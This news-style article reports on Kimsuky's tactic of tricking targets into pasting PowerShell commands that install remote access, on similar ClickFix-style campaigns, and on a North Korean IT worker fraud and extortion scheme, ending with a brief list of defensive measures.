North Korean Cyberattackers Hijack Devices with PowerShell Manipulation

A North Korea-linked threat actor known as Kimsuky has been observed using a new tactic that involves deceiving targets into running PowerShell as an administrator and then instructing them to paste and run malicious code. This method represents a shift in the group’s attack techniques, enabling them to bypass traditional security measures and gain unauthorized access to systems more efficiently.

The Social Engineering Tactic

To execute this attack, the threat actor masquerades as a South Korean government official and builds rapport with a target over an extended period. This is a classic example of social engineering, where the attacker gains the trust of the victim to manipulate them into taking a harmful action.

Once trust is established, the attacker sends a spear-phishing email with a seemingly legitimate PDF attachment. The email may contain language and formatting consistent with official government communications, making it more convincing. However, instead of delivering a malicious payload directly, the attackers use a more deceptive technique.

How the Attack Works

To read the purported PDF document, victims are instructed to click a URL that leads to a website containing a set of steps to “register” their Windows system. The site urges them to launch PowerShell as an administrator, copy/paste the displayed code snippet into the terminal, and execute it.

At first glance, the instructions appear harmless — perhaps framed as a security verification step. However, once executed, the code downloads and installs a browser-based remote desktop tool, along with a certificate file containing a hardcoded PIN from a remote server.

The malicious code then sends a web request to a remote server to register the victim’s device using the downloaded certificate and PIN. This grants the attackers persistent remote access, allowing them to exfiltrate sensitive data, monitor user activity, and potentially deploy additional malware.

This approach has been observed in limited attacks since January 2025, marking a departure from Kimsuky’s usual tactics. Unlike traditional phishing attempts that rely on malicious email attachments or exploit vulnerabilities, this method capitalizes on human behavior, tricking victims into executing the attack themselves.

Similar Techniques in Other Cyber Campaigns

Kimsuky is not the only North Korean hacking crew to adopt this strategy. In December 2024, it was revealed that threat actors linked to the Contagious Interview campaign had tricked macOS users into copying and executing malicious commands via the Terminal app. The attackers claimed the process was necessary to resolve issues with accessing the camera and microphone through a web browser.

Such attacks, along with those leveraging the so-called ClickFix method, have surged in recent months. A key reason for their success is that they rely on users to bypass their own security protections. Since the commands are executed manually by the victims, security software often fails to detect the compromise in time.

Escalation of IT Worker Fraud Scheme

In addition to direct cyber intrusions, North Korean threat actors have also been involved in fraudulent IT worker schemes, enabling them to infiltrate major corporations under false identities.

A 48-year-old woman from Arizona recently pleaded guilty for her role in such a scheme, which allowed North Korean IT workers to obtain remote jobs in more than 300 companies by posing as U.S. citizens and residents. The activity generated over $17.1 million in illicit revenue between October 2020 and October 2023.

The fraud involved stealing the identities of real U.S. nationals and using their credentials to apply for IT jobs. To make the deception more convincing, false documents were transmitted to government agencies to support the applications. Many of these jobs were at Fortune 500 corporations and involved access to sensitive internal systems.

To further facilitate the scheme, the defendant set up a laptop farm at her residence. Multiple laptops were configured to appear as if the North Korean workers were operating from within the United States, when in reality, they were based in China and Russia and remotely connected to company networks.

As a result of this fraudulent scheme:

• More than 300 companies were affected.
• Over 70 identities of U.S. nationals were compromised.
• False information was transmitted to government agencies on more than 100 occasions.
• Over 70 individuals had false tax liabilities created in their names.
• Ransom and Data Extortion Tactics

Recent law enforcement efforts have put increased scrutiny on these fraudulent IT operations. However, in response, North Korean actors have escalated their tactics, turning to data exfiltration and extortion as additional revenue sources.

When North Korean IT workers are discovered within company networks, they have been known to leverage their unauthorized access to steal sensitive data, source code, and proprietary information. Rather than simply disappearing, they hold this stolen data hostage, demanding ransom payments to prevent its public release.

In some instances, North Korean IT workers have publicly leaked proprietary code from victim companies, causing reputational and financial damage. These cases highlight the evolving threat landscape, where cybercriminals are increasingly combining traditional hacking techniques with financial extortion schemes.

Defensive Measures and Mitigation Strategies

Organizations must adopt a multi-layered approach to cybersecurity to defend against these emerging threats. Key strategies include:

• Strict Authentication Policies:
• User Awareness Training:
• System Monitoring and Behavioral Analysis:
• Patch Management and Software Updates:
• Incident Response Planning:

Conclusion

The tactics employed by Kimsuky and other North Korean hacking groups illustrate the shifting nature of cyber threats. Rather than relying solely on technical exploits, attackers increasingly use deception and manipulation to trick users into compromising their own security.

At the same time, North Korea’s fraudulent IT worker schemes demonstrate how cybercrime and financial fraud are becoming intertwined. These operations not only generate revenue but also grant adversaries access to valuable corporate networks, which can be leveraged for espionage and further cyberattacks.

To counter these threats, organizations must adopt a proactive security posture. Combining user education, strict access controls, real-time monitoring, and rapid incident response will be critical in mitigating the risks posed by advanced persistent threats.

As cyber adversaries continue to refine their techniques, staying ahead of emerging threats will require continuous vigilance and adaptation. By implementing robust security measures, organizations can significantly reduce their exposure to these evolving attack vectors.